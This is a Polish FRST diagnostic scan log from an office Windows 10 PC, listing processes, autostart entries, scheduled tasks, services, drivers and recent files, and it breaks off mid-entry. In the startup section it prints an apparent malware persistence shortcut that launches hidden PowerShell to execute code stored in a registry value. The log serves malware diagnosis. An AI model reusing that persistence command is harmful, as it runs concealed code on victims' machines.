Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 27-01-2021 Uruchomiony przez Biuro 1 (administrator) BIURO1-KOMPUTER (Dell Inc. OptiPlex 790) (30-01-2021 13:12:56) Uruchomiony z C:\Users\Biuro 1\Downloads Załadowane profile: Biuro 1 Platform: Windows 10 Pro Wersja 2004 19041.746 (X64) Język: Polski (Polska) Domyślna przeglądarka: Edge Tryb startu: Normal ==================== Procesy (filtrowane) ================= (Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Comarch S.A. -> ) C:\Program Files (x86)\Comarch\ComarchCryptoProvider\ComarchCryptoServer.exe <2> (Comarch S.A. -> ) C:\Program Files (x86)\Comarch\ComarchCryptoProvider\watchdog_service.exe <2> (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <14> (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe (Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe (Intel Corporation) [Brak podpisu cyfrowego] C:\Windows\System32\IPROSetMonitor.exe (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (Microsoft Corporation -> Microsoft Corporation) C:\Users\Biuro 1\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation -> Microsoft Corporation) C:\Users\Biuro 1\AppData\Local\Microsoft\Teams\current\Teams.exe <9> (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe <2> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SecurityHealthHost.exe <2> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe (Samsung Electronics CO., LTD. -> ) C:\Windows\SysWOW64\SecUPDUtilSvc.exe (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) C:\Windows\System32\spool\drivers\x64\3\NetFaxServer64.exe (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) C:\Windows\System32\spool\drivers\x64\3\NetFaxTray64.exe ==================== Rejestr (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.) HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [464608 2014-09-08] (Samsung Electronics CO., LTD. -> ) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3942864 2016-10-13] (Logitech -> Logitech, Inc.) HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PIconStartup.exe [113656 2013-01-24] (Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation) HKLM-x32\...\Run: [WatchDogUserAutostart] => C:\Program Files (x86)\Comarch\ComarchCryptoProvider\watchdog_service.exe [556696 2018-09-25] (Comarch S.A. -> ) HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation) HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation) HKU\S-1-5-21-3663128269-3686145600-3810933498-1000\...\Run: [com.squirrel.Teams.Teams] => C:\Users\Biuro 1\AppData\Local\Microsoft\Teams\Update.exe [2453688 2021-01-28] (Microsoft 3rd Party Application Component -> Microsoft Corporation) HKU\S-1-5-21-3663128269-3686145600-3810933498-1000\...\RunOnce: [Application Restart #0] => C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session -- hxxps://mydhl.express.dhl/pl/pl/b2l.htm (dane wartości zawierają 99 znaków więcej). HKLM\...\Windows x64\Print Processors\Samsung Network PC Fax Print Processor: C:\Windows\System32\spool\prtprocs\x64\NetFaxProc64.dll [154816 2014-10-22] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) HKLM\...\Windows x64\Print Processors\ssn2mPC: C:\Windows\System32\spool\prtprocs\x64\ssn2mpc.dll [43520 2015-03-18] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Codename Longhorn DDK provider) HKLM\...\Windows x64\Print Processors\SST3CPC: C:\Windows\System32\spool\prtprocs\x64\sst3cpc.dll [36864 2011-06-21] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Server 2003 DDK provider) HKLM\...\Windows x64\Print Processors\usp02PC: C:\Windows\System32\spool\prtprocs\x64\usp02pc.dll [43520 2014-02-24] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Codename Longhorn DDK provider) HKLM\...\Print\Monitors\Samsung Network PC Fax Port: C:\WINDOWS\system32\NetFaxPort64.dll [417472 2014-10-22] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) HKLM\...\Print\Monitors\SST3C Langmon: C:\WINDOWS\system32\sst3cl6.dll [34304 2011-06-21] (Microsoft Windows Hardware Compatibility Publisher -> ) HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> ) HKLM\...\Print\Monitors\usp02 Langmon: C:\WINDOWS\system32\usp02l.dll [29184 2014-04-16] (Microsoft Windows Hardware Compatibility Publisher -> ) HKLM\...\Print\Monitors\ZDesigner Language Monitor: C:\WINDOWS\system32\zdnNLM64.dll [270984 2015-03-06] (Zebra Technologies -> Euro Plus d.o.o.) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\88.0.4324.104\Installer\chrmstp.exe [2021-01-30] (Google LLC -> Google LLC) HKLM\Software\...\Authentication\Credential Providers: [{503739d0-4c5e-4cfd-b3ba-d881334f0df2}] -> Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Samsung Network PC Fax.lnk [2015-05-29] ShortcutTarget: Samsung Network PC Fax.lnk -> C:\Windows\System32\spool\drivers\x64\3\NetFaxTray64.exe (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) Startup: C:\Users\Biuro 1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iexplorer.lnk [2019-06-19] ShortcutAndArgument: iexplorer.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe => -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\nssccfile' -Name t;IEX $t.t; GroupPolicy: Ograniczenia ? <==== UWAGA Policies: C:\ProgramData\NTUSER.pol: Ograniczenia <==== UWAGA ==================== Zaplanowane zadania (filtrowane) ============ (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {01090E24-A21D-4077-9777-EE8DEBD9DD50} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {035FDA54-1217-4910-A383-4935A61572D1} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA Task: {03C3EF7F-F067-4040-9E7C-15554D60F97A} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe Task: {06937644-3A8B-4E41-968E-3073899AAA64} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe Task: {0AD127C7-7889-4DD1-A0FB-634A66DF2717} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA Task: {13144CB3-FE92-4FE8-804B-13D291B9A134} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA Task: {17CB9A08-9CC3-4423-943D-DE642FD5CB2D} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA Task: {19F1DA9D-BBEA-46B1-9FB4-EF957F2E98E4} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe Task: {1A8BC189-F5A7-48DD-A265-7410B55AA21A} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA Task: {2C336991-8AB5-4235-A038-1773B0C267E0} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe Task: {2E5C642F-721B-45EF-B302-D7422EFBE534} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA Task: {33125050-5503-422E-BCD1-B913838E5947} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {34C20A50-E2AD-49C3-833D-D3E8FF25405C} - \Microsoft\Windows\Setup\gwx\rundetector -> Brak pliku <==== UWAGA Task: {3BE16ECB-B145-4D46-AF67-4B55D90D1AD8} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe Task: {3F3098E6-EFE9-4097-872C-48AAC11BF1DA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [107848 2015-05-18] (Google Inc -> Google Inc.) Task: {42D8BE95-1644-43A3-BDA1-A5DE05F2BA3B} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe Task: {44F806CD-3C2E-487E-BA77-E85D941DEFA0} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Brak pliku <==== UWAGA Task: {486D715E-6AA2-44CF-BC48-B6990CBB53C6} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControlsMigration => {343D770D-7788-47C2-B62A-B7C4CED925CB} Task: {4F103DFE-BA08-4DC8-B259-535F39111CA6} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {4F8D914D-8B12-4FBC-BBFF-E8A4765F47B2} - System32\Tasks\Microsoft\Windows\MobilePC\HotStart => {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} Task: {508DECA9-014A-45BA-AA7D-E8E383756B6F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA Task: {512C0982-4059-46DA-A9CD-98BCFB3C8127} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.) Task: {523FB073-CF31-4DBD-8D7C-D877DD2FC2F0} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe Task: {53C5F70A-F265-4EEE-856E-270076AD0A35} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {5B42DD9C-5A26-4F27-BB95-34603F0997E5} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControls => {DFA14C43-F385-4170-99CC-1B7765FA0E4A} Task: {5D787CB8-B435-48E0-8581-D37890E33B8C} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku <==== UWAGA Task: {619C17D1-BF59-4D58-9F47-7CC150A51EA3} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA Task: {6262AAF0-5A0F-45BD-8103-EE8A004A6D62} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [436560 2015-03-20] (Dell Inc -> PC-Doctor, Inc.) Task: {686D288D-4E14-43DB-AED9-3E059D5E789F} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [143720 2021-01-25] (Microsoft Corporation -> Microsoft Corporation) Task: {6F8AD332-1771-4C33-B8A4-AB34188527E7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [107848 2015-05-18] (Google Inc -> Google Inc.) Task: {701922AB-8EB5-4302-9397-F188696CBCF1} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe Task: {74A3C0DD-FFD4-486C-BAF0-B8ECCF4CCB68} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {7BA5DBE3-76FB-4351-A3A0-D800DAE4F7C7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA Task: {7D71FF89-B4A0-4E39-9CAB-1777A46473D9} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe Task: {7D821E86-84B6-4CB4-A6F9-63D8D24C8900} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {7E36A5EF-664C-43BC-9B67-7507A0914947} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [143720 2021-01-25] (Microsoft Corporation -> Microsoft Corporation) Task: {8917805E-A199-421A-82A1-18CEEF100F53} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23062920 2021-01-26] (Microsoft Corporation -> Microsoft Corporation) Task: {93FDA74A-922C-46BB-BF8C-20C7C8D2E24D} - System32\Tasks\Microsoft\Windows\SideShow\AutoWake => {E51DFD48-AA36-4B45-BB52-E831F02E8316} Task: {940B0A2F-4958-45AF-9186-FDD4210FE6B1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA Task: {9C480202-1901-4BD2-A226-B132C5A6210C} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Brak pliku <==== UWAGA Task: {9D164CB6-7263-4B72-A392-5681FF7455FB} - System32\Tasks\Mozilla\Firefox Default Browser Agent E7CF176E110C211B => C:\Program Files (x86)\Mozilla Firefox\default-browser-agent.exe [677344 2021-01-29] (Mozilla Corporation -> Mozilla Foundation) Task: {A0C9006C-391A-45C9-9524-D35D550F9543} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe Task: {A5F40EB6-7ACB-4360-9564-287701B9396B} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe Task: {A882C1C5-88CC-40C3-BA51-95F5026B11F4} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {AA05E80E-BF93-4257-9539-26968CB6126E} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Brak pliku <==== UWAGA Task: {AE0F1907-F708-4870-9919-A27319754C7C} - System32\Tasks\WiseCleaner\WRCSkipUAC => C:\Program Files (x86)\Wise\Wise Registry Cleaner\WiseRegCleaner.exe [8191816 2021-01-28] (Lespeed Technology Co., Ltd -> WiseCleaner.com) Task: {AF53DD11-037E-4C2C-ABD9-D6CE4EB8F16D} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> Brak pliku <==== UWAGA Task: {AFF44A34-C1A8-4272-AA0A-FB5D9860512C} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe Task: {B0583F92-F92C-4AAE-9128-27743760FDF6} - \Microsoft\Windows\Setup\EOONotify -> Brak pliku <==== UWAGA Task: {B0CBAB43-44FC-469B-A4CE-87426761FDCE} - System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor => {EA9155A3-8A39-40B4-8963-D3C761B18371} Task: {BCAD6895-A69B-47C9-8841-A09312BB778D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {BDF3D294-AEFC-406F-9A56-8BC43583C595} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {BED3B31A-0B57-4EA7-82E1-B9EA59965881} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe Task: {C0397F23-9A5B-4627-8677-2DA8F3D4462B} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA Task: {C18BAB76-CBF6-449B-B234-EC079E0F68E6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {C2C3CA14-343F-4B7A-A544-A73847801DD1} - System32\Tasks\Microsoft\Windows\SideShow\SessionAgent => {45F26E9E-6199-477F-85DA-AF1EDFE067B1} Task: {C740720A-D0D0-46A6-B738-30985B165CA8} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {C75E7111-1547-4501-98FC-735C0A162A0A} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {D30E1E34-CA3E-4C4F-9CF8-E1AFAAC53D84} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23062920 2021-01-26] (Microsoft Corporation -> Microsoft Corporation) Task: {D64DAEC4-48C9-4D83-864B-7BC2CC41A8B4} - System32\Tasks\Microsoft\Windows\SideShow\SystemDataProviders => {7CCA6768-8373-4D28-8876-83E8B4E3A969} Task: {DCB61CCB-8402-420E-B042-8A1D34FF2BDF} - System32\Tasks\Microsoft\Windows\SideShow\GadgetManager => {FF87090D-4A9A-4F47-879B-29A80C355D61} Task: {E4FE4B52-B426-4DD6-9890-2A0E7B9053F0} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {F1800D76-B83C-4B5B-95B6-E116500B1199} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Internet (filtrowane) ==================== (Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.) Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{a935f2b1-cd45-45f1-8582-dddd081d8fb8}: [DhcpNameServer] 192.168.0.1 Edge: ======= Edge DefaultProfile: Default Edge Profile: C:\Users\Biuro 1\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-30] FireFox: ======== FF DefaultProfile: rj92fpms.default-1599558508366 FF ProfilePath: C:\Users\Biuro 1\AppData\Roaming\Mozilla\Firefox\Profiles\rj92fpms.default-1599558508366 [2021-01-30] FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-03] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2021-01-08] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2020-09-03] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.) Chrome: ======= CHR DefaultProfile: Default CHR Profile: C:\Users\Biuro 1\AppData\Local\Google\Chrome\User Data\Default [2021-01-30] CHR Notifications: Default -> hxxps://bezprawnik.pl; hxxps://poczta.onet.pl; hxxps://www.portalfk.pl CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Biuro 1\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-30] CHR Extension: (Chrome Media Router) - C:\Users\Biuro 1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-01-30] CHR Profile: C:\Users\Biuro 1\AppData\Local\Google\Chrome\User Data\Guest Profile [2019-10-03] CHR Profile: C:\Users\Biuro 1\AppData\Local\Google\Chrome\User Data\System Profile [2019-10-03] ==================== Usługi (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8960384 2021-01-26] (Microsoft Corporation -> Microsoft Corporation) R2 ComarchCryptoWatchdog; C:\Program Files (x86)\Comarch\ComarchCryptoProvider\watchdog_service.exe [556696 2018-09-25] (Comarch S.A. -> ) R2 Intel(R) PROSet Monitoring Service; C:\Windows\system32\IProsetMonitor.exe [505856 2018-01-31] (Intel Corporation) [Brak podpisu cyfrowego] R2 Samsung Network Fax Server; C:\Windows\system32\spool\drivers\x64\3\NetFaxServer64.exe [793280 2014-10-22] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) R2 SamsungUPDUtilSvc; C:\Windows\SysWOW64\SecUPDUtilSvc.exe [118576 2014-11-26] (Samsung Electronics CO., LTD. -> ) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation) ===================== Sterowniki (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Brak podpisu cyfrowego] R3 GemCCID; C:\WINDOWS\System32\drivers\GemCCID.sys [139632 2015-07-10] (Microsoft Windows Hardware Compatibility Publisher -> Gemalto) S3 HPMoA407; C:\WINDOWS\System32\drivers\HPMoA407.sys [25088 2011-10-31] (Microsoft Windows Hardware Compatibility Publisher -> Hewlett-Packard.) S3 HPubA407; C:\WINDOWS\System32\Drivers\HPubA407.sys [18944 2012-06-14] (Microsoft Windows Hardware Compatibility Publisher -> Hewlett-Packard.) S3 MpKsl9dd26769; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{66BF19BD-D3F3-4258-80CF-5F049437F08D}\MpKslDrv.sys [47344 2021-01-30] (Microsoft Windows -> Microsoft Corporation) S3 NAL; C:\Windows\system32\Drivers\iqvw64e.sys [50152 2017-10-18] (Intel(R) INTELND1617 -> Intel Corporation) S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation) U3 idsvc; Brak ImagePath ==================== NetSvcs (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Jeden miesiąc (utworzone) (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2021-01-30 13:12 - 2021-01-30 13:13 - 000023877 _____ C:\Users\Biuro 1\Downloads\FRST.txt 2021-01-30 13:12 - 2021-01-30 13:12 - 002297856 _____ (Farbar) C:\Users\Biuro 1\Downloads\FRST64.exe 2021-01-30 13:09 - 2021-01-30 13:09 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla 2021-01-30 13:04 - 2021-01-30 13:04 - 000763780 _____ C:\WINDOWS\Minidump\013021-4234-01.dmp 2021-01-30 12:59 - 2021-01-30 13:09 - 000000000 ____D C:\Users\Biuro 1\AppData\Roaming\Wise Registry Cleaner 2021-01-30 12:59 - 2021-01-30 12:59 - 004019704 _____ (WiseCleaner.com ) C:\Users\Biuro 1\Downloads\WRCFree_10.3.4.693.exe 2021-01-30 12:59 - 2021-01-30 12:59 - 000001311 _____ C:\Users\Public\Desktop\Wise Registry Cleaner.lnk 2021-01-30 12:59 - 2021-01-30 12:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\WiseCleaner 2021-01-30 12:59 - 2021-01-30 12:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wise Registry Cleaner 2021-01-30 12:59 - 2021-01-30 12:59 - 000000000 ____D C:\Program Files (x86)\Wise 2021-01-30 12:48 - 2021-01-30 12:53 - 000000000 _____ C:\Recovery.txt 2021-01-30 12:42 - 2021-01-30 13:04 - 000008192 ___SH C:\DumpStack.log.tmp 2021-01-30 12:28 - 2021-01-30 12:43 - 000000000 ___HD C:\$WINDOWS.~BT 2021-01-29 13:54 - 2021-01-29 14:25 - 000000000 ____D C:\Users\Biuro 1\Desktop\Leoni Kolomya 29.01.2021 2021-01-29 12:24 - 2021-01-29 12:30 - 000000000 ____D C:\Users\Biuro 1\Desktop\Leoni 29.01.2021 Lwów 2021-01-29 10:36 - 2021-01-30 13:09 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox 2021-01-28 14:44 - 2021-01-28 14:44 - 000077428 _____ C:\Users\Biuro 1\Downloads\etykieta_23250790592.pdf 2021-01-28 14:10 - 2021-01-28 14:10 - 000782708 _____ C:\WINDOWS\Minidump\012821-5406-01.dmp 2021-01-28 11:40 - 2021-01-28 11:40 - 000602844 _____ C:\WINDOWS\Minidump\012821-4515-01.dmp 2021-01-28 09:44 - 2021-01-28 09:44 - 000653420 _____ C:\WINDOWS\Minidump\012821-4156-01.dmp 2021-01-27 15:22 - 2021-01-27 15:22 - 000590956 _____ C:\WINDOWS\Minidump\012721-4281-01.dmp 2021-01-27 15:03 - 2021-01-27 15:03 - 000013735 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_27012021_150317.pdf 2021-01-27 13:18 - 2021-01-27 13:18 - 000583124 _____ C:\WINDOWS\Minidump\012721-4453-01.dmp 2021-01-27 11:50 - 2021-01-27 11:50 - 000077297 _____ C:\Users\Biuro 1\Downloads\etykieta_23246607235.pdf 2021-01-27 11:49 - 2021-01-27 11:49 - 000593620 _____ C:\WINDOWS\Minidump\012721-4500-01.dmp 2021-01-27 10:40 - 2021-01-27 10:40 - 000584668 _____ C:\WINDOWS\Minidump\012721-4250-01.dmp 2021-01-27 10:29 - 2021-01-27 10:29 - 